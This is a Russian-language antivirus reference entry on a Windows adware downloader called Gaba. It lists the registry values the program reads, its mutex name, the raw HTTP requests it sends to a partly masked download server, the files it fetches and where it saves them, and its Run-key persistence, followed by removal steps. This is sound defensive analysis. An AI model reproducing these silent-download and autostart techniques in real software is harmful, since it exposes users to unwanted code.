Вредоносная программа not-a-virus:AdWare.Win32.Gaba.enc


Описание
not-a-virus:AdWare.Win32.Gaba.enc - программа, загружающая из сети Интернет другие компоненты. Является приложением Windows (PE-EXE файл). Размер - 492640 байт. Написана на C++.


Деструктивная активность
После запуска приложение определяет текущие настройки "Проводника", считывая значения параметров:

  • NoRun
  • NoDrives
  • RestrictRun
  • NoNetConnectDisconnect
  • NoRecentDocsHistory
  • NoClose

ключа реестра:

  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]


Для контроля уникальности своего процесса в системе создает уникальный идентификатор с именем

  • "asdfasdfqwrqr123rwqefasdfasdfasdrqwer"


Затем осуществляет следующий HTTP запрос:

  • POST /upd.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: GPInstaller2
    Host: client***workgp.com
    Content-Length: 134
    Cache-Control: no-cache
    wtdat=54a78096958b9a7276003725b16a30ac793f86621799ee835
    2ec5efa1c5fdcef95358852675ff664bd6a9e9a8e985d2f5cfaee833b
    5669ef35d32079a7975ea7


В ответ сервер возвращает ссылку на загрузку файла:

  • http://clien***tworkgp.com/./data/configs_micro_by_network/1306/INSTALLS/sacc.cfg


Файл загружается и сохраняется под именем:

  • %Documents and Settings%\%Current User%\Application Data\GabPath\config.cfg


Загруженный файл имеет размер 60863 байта и хранит в себе зашифрованные данные.

Также осуществляет HTTP запросы:

  • POST /upd.php HTTP/1.1..
    Content-Type: application/x-www-form-urlencoded..
    User-Agent: GPInstaller2..
    Host: client***workgp.com..
    Content-Length: 102..
    Cache-Control: no-cache....
    wtdat=b8e7d3cb092cf00d94e863fc3d68dc195aae38b57
    baf0f9f7a339a2346ccbcce34213ac17fead19bd61540dcadf90512
    GET /./data/gp/exe/GabPath.prod.v111400.30Apr2011.exe.d3a48
    cddf679929df9b9330358168684 HTTP/1.1..
    User-Agent: GPInstaller2..
    Host: clients.networkgp.com....


Выполняет загрузку файлов, которые размещаются по ссылкам:

  • http://client***workgp.com/./data/gp/exe/GabPath.prod.v<версия_файла>.
    <дата_загрузки>.exe.<хеш_файла>

  • http://client***path.com/./data/gabpath/uninstaller/GPUninstaller.prod.v
    <версия_файла>.<дата_загрузки>.exe.<хеш_файла>


Загруженные файлы сохраняются под следующими именами:

  • %Documents and Settings%\%Current User%\Application
     Data\GabPath\GPUninstall.exe – имеет размер 270336 байт.

  • %Documents and Settings%\%Current User%\Application
     Data\GabPath\gabpath.exe – данный файл имеет размер 488884 байт


Для автоматического запуска при каждом следующем старте системы добавляет ссылку на исполняемый файл

  • "gabpath.exe"

в ключ автозапуска системного реестра:

  • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "GabPath"="%Documents and Settings%\%Current User%\
    Application Data\GabPath\gabpath.exe"


Методы борьбы
Для удаления вредоносной программы необходимо:

  1. Удалить параметр ключа системного реестра:
    • [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "GabPath"="%Documents and Settings%\%Current User%\
      Application Data\GabPath\gabpath.exe"

  2. Удалить файлы:
    • %Documents and Settings%\%Current User%\Application Data\
      GabPath\config.cfg

    • %Documents and Settings%\%Current User%\Application Data\
      GabPath\gabpath.exe

    • %Documents and Settings%\%Current User%\Application Data\
      GabPath\GPUninstall.exe

  3. Произвести полную проверку компьютера лечащей утилитой Dr.Web CureIt! либо Антивирусом Касперского с обновленными антивирусными базами.